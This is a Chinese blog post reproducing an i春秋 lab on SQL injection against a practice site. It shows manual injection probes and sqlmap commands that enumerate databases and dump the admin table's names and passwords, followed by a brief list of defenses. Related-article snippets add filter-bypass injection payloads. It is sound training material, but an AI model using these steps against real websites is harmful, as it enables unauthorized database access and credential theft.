i春秋:无处不在的SQL注入

最新推荐文章于 2023-04-20 19:12:20 发布
最新推荐文章于 2023-04-20 19:12:20 发布
阅读量3.6k 收藏
点赞数
文章标签: 入侵 初学 安全 渗透 漏洞
实验环境
  • 实验环境
    • 操作机:Windows XP
    • 目标机:Windows 2003
  • 目标网址:www.test.ichunqiu
  • 实验工具:sqlmap注入工具
实验目的

本节课程通过对SQL注入的演示,让大家了解SQL注入漏洞的方式,并学习应对此种漏洞的防御方法。

实验思路
  1. 手工检测判断注入点
  2. 利用SQLMap注入数据库
  3. 获取数据库信息
  4. 防御方案
实验步骤
1

手工检测判断注入点

首先打开目标站点www.test.ichunqiu找注入点,打开文章中心随便点一篇文章,页面地址为http://www.test.ichunqiu/Art——Show.php?id=2,首先在id=2后面加一个单引号来判断这是否是一个注入点,返回了一个错误提示更新点击数出现错误!

小i提示:

  • 可以看见url里有一个id=2,可以根据这个判断他是由get请求进行提交的,因为通过get请求提交的,提交的数据会在url里进行体现,而这个也是我们可以利用的地方。

Alt text

现在替换一个注入查询语句换成 and 1=1,页面并没有出现变化,再换成 and 1=2

小i提示:

  • 这里出现了一个错误提示,更新点击树出现错误,这样说明我们输入的and 1=1 和and 1=2在数据库内执行了,因为and 1=1这条查询语句就永为真,它就会继续执行,and 1=2 这条语句就为假,查询语句无法继续执行,就会返回错误,这样我们就可以初步判断这个url地址是一个注入点。

Alt text

2

利用sqlmap对注入点进行注入

将注入点放到sqlmap里进行进一步的判断,打开桌面上的sqlmap

  python sqlmap.py –u "http://www.test.ichunqiu/Art——Show.php?id=2"

返回信息提示这是一个注入点并且返回对方系统的信息,系统是windows,Web容器是apache2.4.9版本,语言php5.2.17版本,目标数据库是mysql5.0.11版本。

Alt text

3

获取数据库内信息

使用以下命令进行注入测试,获取数据库内所有数据库的名称,返回信息目标数据库内有四个数据库:mys mysql test information_schema

 Python sqlmap.py –u "http://www.test.ichunqiu/Art——Show.php?id=2" --dbs

Alt text

使用以下命令查看网站所依赖的数据库的名称,返回信息依赖的数据库为mys

Python sqlmap.py –u "http://www.test.ichunqiu/Art——Show.php?id=2" --current–db

Alt text

使用以下命令获取mys数据库内表信息。

  Python sqlmap.py –u "http://www.test.ichunqiu/Art——Show.php?id=2" -D mys --tables

Alt text

mys数据库下一共有十四个表,使用命令获取zzcms_admin表内列的信息。

 Python sqlmap.py –u "http://www.test.ichunqiu/Art——Show.php?id=2" -D mys -T zzcms_admin --columns

Alt text

使用以下命令对这namepassword两个列进行查询并获取KEY。

     Python sqlmap.py –u "http://www.test.ichunqiu/Art——Show.php?id=2" -D mys -T zzcms_admin  –C name,password --dump

Alt text

4

防御方案

1.普通用户与系统管理员的权限要有严格的区分

2.强迫使用参数化语句

3.加强对用户输入的验证

4.多使用数据库自带的安全参数

5.使用专业的漏洞扫描工具来寻找可能被攻击的点

喜欢散步
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
zzcms sql注入分析
课嗨教育的专栏
10-26 508
action=="del" 下面应用sql语句不存在任何过滤,被直接带入到了query中执行。
i春秋SQL注入-1
金 帛的博客
04-04 715
i春秋WP
i春秋web-SQL(基础绕过注入)
Sea_Sand息禅
05-21 744
很简单的一道注入,没有任何闭合,直接就是个整数的注入 id=1 order by 1 报错:inj code! 对order进行处理 1)id=1 or<>der by 1 报错:inj code! 2)id=1 ord<>er by 1 页面正常 id=-1 union sel<>ect 1,2,3 页面显示2,说明作用...
sql注入2之sqlmap
这周末在做梦的博客
09-29 135
一,下载方式 可以在github上自行下载 https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md 二,依旧针对ctfhub字符型注入 直接使用配置好的sqlmap --dump把flag的coulmn项转储就可以了。 得到flag 三,linux安装方式 终端输入git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sq
i 春秋 CTF训练营 web——SQL注入 1(字符型注入)(手动注入)
AAAAAAAAAAAA66的博客
11-30 2555
这道题可以直接使用sqlmap 直接跑出。 下文介绍的是手注: 本文用到了搜狐插件hackbar,(使用效果与直接在url栏输入参数相同) 题目(得知是注入题) 判断是否为数字型 http://eci-2ze7889omx49vxiu5ma0.cloudeci1.ichunqiu.com/index.php?id=1 and 1=1 http://eci-2ze7889omx49vxiu5ma0.cloudeci1.ichunqiu.com/index.php?id=1 and 1.
gosho-everywhere:无处不在
05-31
【标题】"gosho-everywhere:无处不在!"是一个项目名称,暗示这是一个可以在多个平台上运行或具有广泛适用性的软件。从描述中我们可以推测,gosho-everywhere 可能是一个旨在帮助用户在不同互联网环境之间轻松切换或...
无处不在的火车:无处不在的火车
02-19
盖茨比的默认启动器 使用此默认样板启动您的项目。 该入门工具随附主要的Gatsby配置文件,您可能需要使用React的快速应用生成器快速启动并运行。 还有其他更具体的想法吗? 您可能需要查看我们充满活力的集合。...
dockerfiles:无处不在的Dockerfiles
01-31
badouralix / dockerfiles ...rancher- -gitlab-ci的rancher-cli -具有有用的linux工具的基于debian的映像 - 的基于高山的图像,ZSH的功能强大的单元测试框架 用法 自己建造 git clone https://github.com
ee:无处不在的环境
02-12
ee 处处环境
PUCK:无处不在的上下文知识
06-24
PUCK of Ubiquitous Contextual Knowledge “就这样吧” PUCK 是一个低功耗分布式传感单元系统。 在 PUCK 服务器上运行: PUCK 管理器处理传感器的所有逻辑并将传入的数据转储到 redis 数据库中。...
50道SQL题答案
02-05
最全50道SQL题答案 最全 最齐 oracle 50道
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
sql注入-sqlmap的使用方法
weixin_42299610的博客
03-07 670
获取一个url: http://localhost/sqli-labs-master/Less-1/?id=1 判断是否有注入:python sqlmap.py –u “http://localhost/sqli-labs-master/Less-1/?id=1” get型注入 查看所有数据库:python sqlmap.py –u “http://localhost/sqli-labs-mast...
二次注入
03-25 340
0x0 原理 针对场景:存在另一处操作直接调用输入数据而不做其他处理 关键:【寻找另一处引用这个数据的操作】如果另一处操作直接将1’作为变量带进自身的sql语句中,且未做如转义等处理,那1’的单引号便会发生作用,起到sql注入的效果 0x11 演示 以sqlilabs 24关为例 先点击forget your pass?出来如下页面,看来是提示我们...
(代码审计)zzcms前台SQL注入
最新发布
Cobra的博客
04-20 599
代码审计
ZZCMS201910审计入门和SQL注入
网络设备配置-华为
11-09 665
php代码审计
usercheck php,zzcms user/logincheck.php SQL注入漏洞
weixin_39844963的博客
03-20 125
inc/function.php 72行```phpfunction getip(){if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))$ip = getenv("HTTP_CLIENT_IP");else if (getenv("HTTP_X_FORWARDED_FOR"...
SQL注入基础实战(i春秋
Jaychouzzk
08-17 3438
1.Access手工注入  实验环境 操作机:Windows XP 目标机:Windows Server 2003 目标地址:http://172.16.12.2 实验工具 火狐浏览器:火狐浏览器是一款非常流行的Internet浏览器。 实验目的 1、学习Asp手工注入方法 2、学习Asp手工注入原理 实验内容 Access Access是Microsoft Office Acc...
SQL注入漏洞原理及防御(I春秋在线实验室,保存笔记)
weixin_30297281的博客
07-06 896
实验环境 漏洞介绍 认识SQL注入漏洞 SQL注入漏洞可以说是在企业运营中会遇到的最具破坏性的漏洞之一,它也是目前被利用得最多的漏洞。 要学会如何防御SQL注入,我们首先要对他的原理进行了解。 SQL注入(SQLInjection)是这样一种漏洞:当我们的Web app在向后台数据库传递SQL语句进行数据库操作时。 如果对用户输入的参...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值